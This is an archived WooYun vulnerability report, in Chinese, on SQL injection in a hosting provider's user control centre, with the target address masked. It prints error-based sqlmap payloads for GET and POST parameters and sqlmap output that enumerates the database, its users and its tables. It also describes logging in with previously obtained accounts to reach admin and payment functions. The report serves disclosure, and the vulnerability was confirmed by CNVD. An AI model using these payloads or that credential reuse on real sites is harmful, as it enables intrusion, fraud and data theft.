乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-23: 细节已通知厂商并且等待厂商处理中 2015-09-25: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-10-05: 细节向核心白帽子及相关领域专家公开 2015-10-15: 细节向普通白帽子公开 2015-10-25: 细节向实习白帽子公开 2015-11-09: 细节向公众公开
登录用户控制中心后有多处SQL注入!~~~可入后台可加款 +泄漏重要信息可登录邮箱等
首先用上次测试获取的几个用户测试登录登录用户控制中心
登录后可以获取几个SQL注入点注入:1、注入点一:
http://**.**.**.**/user/domain_list.php?iStatus=2 (GET)
iStatus存在注入
http://**.**.**.**/user/domain_list.php?iStatus=2'返回错误MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => select count(*) from domain where 1 AND UserName='*******' AND iStatus='2'' ) [2] => Array ( [error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2''' at line 1 ) [3] => Array ( [errno] => 1064 ) )
sqlmap测试
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: iStatus Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: iStatus=2' AND (SELECT 4685 FROM(SELECT COUNT(*),CONCAT(0x71786a6871,(SELECT (CASE WHEN (4685=4685) THEN 1 ELSE 0 END)),0x7166757471,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KvQP'='KvQP---[10:14:47] [INFO] testing MySQL[10:14:48] [INFO] heuristics detected web page charset 'ascii'[10:14:48] [WARNING] reflective value(s) found and filtering out[10:14:48] [INFO] confirming MySQL[10:14:48] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0[10:14:48] [INFO] fetching current user[10:14:48] [INFO] resumed: gz3721@%current user: 'gz3721@%'[10:14:48] [INFO] fetching current database[10:14:48] [INFO] resumed: gz3721current database: 'gz3721'[10:14:48] [INFO] testing if current user is DBA[10:14:48] [INFO] fetching current usercurrent user is DBA: Falsedatabase management system users [1]:[*] 'gz3721'@'%'available databases [2]:[*] gz3721[*] information_schemaDatabase: gz3721[27 tables]+--------------+| 400 || database || domain || order || admins || config || dcontact || doc || email || financial || getpwd || host || mohost || news || nicebox || nicecall || onlinepay || payment_type || products || qq || question || secu_class || security || server || server_old || sms || users |+--------------+Database: gz3721+--------------+---------+| Table | Entries |+--------------+---------+| doc | 247 || products | 227 || security | 48 || question | 46 || config | 33 || financial | 23 || users | 18 || secu_class | 14 || `order` | 13 || onlinepay | 12 || news | 11 || getpwd | 7 || `domain` | 6 || dcontact | 6 || payment_type | 5 || host | 3 || admins | 2 || email | 2 || qq | 1 || server | 1 |+--------------+---------+
可获取信息进入管理后台,可以利用敏感信息进入邮箱。
2、注入点2:
http://**.**.**.**/user/domain_list.php (POST)keyword=111http://**.**.**.**/user/host_list.php (POST)keyword=222http://**.**.**.**/user/mohost_list.php (POST)keyword=333http://**.**.**.**/user/email_list.php (POST)keyword=444……http://**.**.**.**/user/host_list.php (POST)keyword=999http://**.**.**.**/user/order_list.php(POST)keyword=1234http://**.**.**.**/user/fin_list.php (POST)keyword=2345http://**.**.**.**/user/infolist.php (POST)keyword=12345
等等,均keyword存在注入
POST parameter 'keyword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ysqlmap identified the following injection points with a total of 35 HTTP(s) requests:---Place: POSTParameter: keyword Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: keyword=111') AND (SELECT 7427 FROM(SELECT COUNT(*),CONCAT(0x7169646471,(SELECT (CASE WHEN (7427=7427) THEN 1 ELSE 0 END)),0x7164796f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('Rdzk'='Rdzk---[18:17:41] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.0[18:17:41] [INFO] fetching current user[18:17:41] [INFO] retrieved: gz3721@%current user: 'gz3721@%'[18:17:41] [INFO] fetching current database[18:17:41] [INFO] retrieved: gz3721current database: 'gz3721'[18:17:41] [INFO] testing if current user is DBA[18:17:41] [INFO] fetching current usercurrent user is DBA: False
database management system users [1]:[*] 'gz3721'@'%'available databases [2]:[*] gz3721[*] information_schema
过滤修复
危害等级:高
漏洞Rank:16
确认时间:2015-09-25 17:15
CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
暂无